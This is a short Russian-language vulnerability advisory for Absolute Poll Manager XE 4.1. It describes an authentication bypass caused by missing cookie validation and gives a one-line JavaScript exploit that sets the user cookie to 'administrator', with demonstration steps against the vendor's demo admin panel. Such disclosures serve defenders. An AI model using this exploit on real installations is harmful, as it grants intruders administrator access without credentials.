Программа: Absolute Poll Manager XE 4.1

Уязвимость позволяет удаленному злоумышленнику обойти ограничения
безопасности на целевой системе. Уязвимость существует из-за ошибки в проверке
входных данных при обработке cookie. Эксплуатирование уязвимости приведет к
обходу механизма аутентификации на целевой системе.

Эксплоит:

javascript:document.cookie="xlaAPM%5Fusr=administrator";

Демонстрация:

Проследуйте в Admin panel : http://www.xigla.com/absolutepm/xlaabsolutepm/login.asp
Используйте эксплойт: javascript:document.cookie="xlaAPM%5Fusr=administrator";
Затем проследуйте в http://www.xigla.com/absolutepm/xlaabsolutepm/menu.asp
Вы увидите Admin panel ..



Оставить мнение